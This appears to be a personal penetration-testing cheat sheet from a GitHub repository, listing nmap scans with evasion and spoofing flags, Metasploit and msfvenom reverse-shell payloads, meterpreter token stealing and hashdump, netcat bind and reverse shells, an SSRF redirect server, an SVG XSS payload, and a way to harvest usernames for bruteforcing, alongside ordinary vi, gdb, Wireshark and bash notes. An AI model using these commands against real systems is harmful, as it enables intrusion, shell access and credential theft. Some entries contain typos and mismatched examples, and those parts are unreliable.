forked from guifre/notes
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathman.txt
301 lines (246 loc) · 9.49 KB
/
man.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
*Manuals*
Bash tricks
Append a character at the end of every line of the file:
*$ sed '/.*?/ ! s/$/new_suffix/' in.txt > out.txt*
recon ng
> show modules
> use recon/domains-vulnerabilities/xssed
> set source google.com
> run
nmap
Normal scans
-sT TCP connect
-sS Stealth scan
Discovery scans
-sP Ping
-sL List Scan
-sO Protocol
-sV Probe open ports to determine service/version info
-sL List scan
Other scans
-sY SCTP init scan, scans new protocol STCP that combines UDP and TCP
-sA tcp ACK, open and closed ports will return RST, if firewall no reply sO IP protocol scan.
-sT Connect scan
-sA ACK scan
-sW Window scan
-sM Maimon scan
-sU UDP Scan
-sN TCP Null scan
Port Specification and Scan Order
-p Specify ports, e.g. -p80,443 or -p1-65535
-p U:PORT Scan UDP ports with Nmap, e.g. -p U:53
-F Fast mode, scans fewer ports than the default scan
OS Detection
-O Enable OS Detection
Timing and Performance
-T[0-5] Timing. Higher is faster
Firewalls IDS Evasion and Spoofing
-f; --mtu VALUE Fragment packets (optionally w/given MTU)
-D decoy1,decoy2,ME Cloak a scan with decoys
-S IP-ADDRESS Spoof source address
-e IFACE Use specified interface
--badsum Send packets with a bogus TCP/UDP/SCTP checksum
Misc Nmap Options
-A Enable OS detection, version detection, script scanning, and traceroute
-P0 Do not ping first
Update scripts:
*$ nmap --script-updatedb*
Scan all TCP and UDP Ports
*$ nmap -v -sU -sS -p- -A -T4 ip
*
Nmap search through Nmap Scripts for a specific keyword
*$
ls /usr/share/nmap/scripts/\* | grep ftp
*
Metaslpoit
Statring metasploit
*$ service postgesql start; update-rc.d postgresql enable; msfconsole; db_rebuild_cache*
MSFconsole
Entry point for the framework
*$ msfconsole*
*> help*
against known vulnerabilities
*> show exploits*
Search a specific product
*> search vsftp*
Create a reverse shell, works for any format (php, asp, exe..):
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f asp > shell.asp*
modules available (DoS tools, port scanning, fuzzers..)
*> show auxiliary*
*> show payloads
> show options
> show targets
> use payload/bla
> set RHOST 192..
> run*
if you need the server to make a callback to you:
set LHOST collaborator.net
is the shell you get when you find RCE in a host.
*> meterpeter*
> screenshot
operating system version etc
*> sysinfo*
tries to elevate privileges
*> use priv*
Route all traffic to a specific IP through a session 2:
*> route add 10.10.10.10 255.255.255.0 2*
Common payloads
*generic/shell_reverse_tcp
windows/meterpreter/reverse_tcp*
MSFcli
non interactive client.
*$ mscli*
Meterpeter
Create a meterpeter reverse shell (any language/format)
*$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f aspx > shell.aspx*
Listen for a reverse shell:
*> set PAYLOAD windows/meterpreter/reverse_tcp*
Put session in background:
*> background*
List sessions
*> sessions -l*
Switch to session
*> session -i 1*
Token stealing
*> use incognito
>list_tokens -u*
>impersonate_token BOB\IWAM_BOB
>ps
>steal_token [PID]
Search files:
*> meterpeter search -f *pass*.txt*
Upload files
*> upload local remote*
Invoke a command shell
*> shell
*
Get the hash from windows users:
*> hashdump*
Netcat
Listens for incoming connections
*$ nc -nlvp 4444*
Connects to a remote server
*$ nc -nv 10.0.0.22 4444*
Serves incorming.exe through 4444
*$ nc -nlvp 4444 > incoming.exe*
Binds shell
*$ nc -nlvp 4444 -e cmd.exe*
Opens a reverse shell (you connect to a machine that can bash into yours)
*$ nc -nv 10.0.0.22 4444 -e /bin/bash*
Wireshark
libpcap and wincap libraries.
network -> capture filters -> capture engine -> display filters
follow TCP stream
*tcp.port == 21
ip.src == 10.43.54.65 or ip.dst == 10.43.54.65
ip.addr != 10.43.54.65*
Find packets with specific flags set/unset:
*tcp.flags.syn == 1
tcp.flags.push == 1
tcp.flags.reset == 0*
Find packet containg string/filter:
*CRTL+F*
Find packet with specific sequence number:
*tcp.seq == xxxx*
Vi
Delete the 10 following characters:
**10x**
Delete the 10 following words:
**10dw**
Delete 10 lines:
**6dd**
Tcpdump
*$ tcpdump -r file.pcap # saves output to file.pcap*
*$ tcpdump -n src host 10.10.10.10 # saves packages from 10.10.10.10*
*$ tcpdump -n dst host 10.10.10.10 # saves packages to 10.10.10.10*
*$ tcpdump -n port 81 # saves packages where port 81 was involved*
*$ tcpdump port not 22 # skips your ssh session traffic*
*$ tcpdump -vv port 80 or port 443 # http and https traffic*
nc
shell
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 0.0.0.0 1234 > /tmp/f
OpenVAS
*$ apt-get update;
apt-get install openvas
openvas-setup
netstat -tulpn
*
Login at
*https://localhost:9392
*
gdb
disas main or disassemble main
b *0x00000000004008e2 # sets a breakpoint to a pos of memory
r or run # runs the program
x/s $esi # prints esi registers
x/s $rax # prints rax registers
info registers # prints all registers
set *(char*)0x0000000000400749=0x75 # changes instruction of this pos to jne
set *(char*)0x0000000000400749=0x74 # changes instruction of this pos to je
list win # shows line of win
bt # shows call stack
info locals # info about local variables
run # runs the app
b main # adds breakpoint in main
r # continues execution
disable 1 # disables break point
info frame # prints info about addrs
info functions # all functions
Display Register Values : (Decimal , Binary , Hex )
*print /d -> Decimal
print /t -> Binary
print /x -> Hex*
Print *EAX* as decimal:
*(gdb) print /d $eax
$17 = 13*
Display memory location, syntax:
*x/nyz (Examine)
n -> Number of fields to display ==>
y -> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
z -> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)*
filter your ssh traffic
$ tcpdump -lt -i eth0 not \( host my.src.address and tcp port 22 \)
Cisco password:
enable secret 5 $1$mERr$Q4J3cxRImm68KXqMDsLDs/
$1 #hash type (1 md5), (5 sha256)
mERr base 64 salt
Q4J3cxRImm68KXqMDsLDs hashed salt + pass
Others
Replace contents of files
*$ find . -name watchdog.sh -exec sed -r -e 's/(^.*)-t 10 -i/-t 9 -i/g' {} \; # replace file contents*
SSH using private key
*$ ssh -i key host*
Generate Ip range
*$ seq -f "192.168.1.10.%g" 1 255*
SSRF web server
*$ while true ; do echo -e "HTTP/1.1 301 Moved Permanently\r\nLocation: 127.0.0.1:22\r\n" | nc -vv -l -p 80 ; done*
Svg XSS payload
*<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE svg [<!ENTITY elem "">]>
<svg onload="alert(document.domain);" height="16" width="16">&elem;</svg>*
Bash quoting
* # | Expression | Result | Comments
---+-------------+-------------+--------------------------------------------------------------------
1 | "$a" | apple | variables are expanded inside ""
2 | '$a' | $a | variables are not expanded inside ''
3 | "'$a'" | 'apple' | '' has no special meaning inside ""
4 | '"$a"' | "$a" | "" is treated literally inside ''
5 | '\'' | \*\*invalid\*\* | can not escape a ' within ''; use "'" or $'\'' (ANSI-C quoting)
6 | "red$arocks"| red | $arocks does not expand $a; use ${a}rocks to preserve $a
7 | "redapple$" | redapple$ | $ followed by no variable name evaluates to $
8 | '\"' | \" | \ has no special meaning inside ''
9 | "\'" | ' | \' is interpreted inside ""
10 | "\"" | " | \" is interpreted inside ""
11 | "\*" | \* | glob does not work inside "" or ''
12 | "\t\n" | \t\n | \t and \n have no special meaning inside "" or ''; use ANSI-C quoting
13 | "`echo hi`" | hi | `` and $() are evaluated inside ""
14 | '`echo hi`' | `echo hi` | `` and $() are not evaluated inside ''
15 | '${arr[0]}' | ${arr[0]} | array access not possible inside ''
16 | "${arr[0]}" | apple | array access works inside ""
17 | $'$a\'' | $a' | single quotes can be escaped inside ANSI-C quoting
---+-------------+-------------+--------------------------------------------------------------------*
Tcpdump
options: host, net, and port.
host: src, dst
Proto: tcp, udp, icmp, ah
File parsing
Print the 9th line of a file that matches a regex.
*$ awk ‘$9 ~ /404/ { print }’ access.log*
Get the usernames from */etc/passwd* and dump them into a file for bruteforcing
*$ awk -F':' '{ print $1}' /etc/passwd > users.txt*
Sort count and print line occurrences of a file
*$ cat file | sort | uniq -c | sort -n*
Grep a regex and print only matched area
*$ grep -E -o regex file*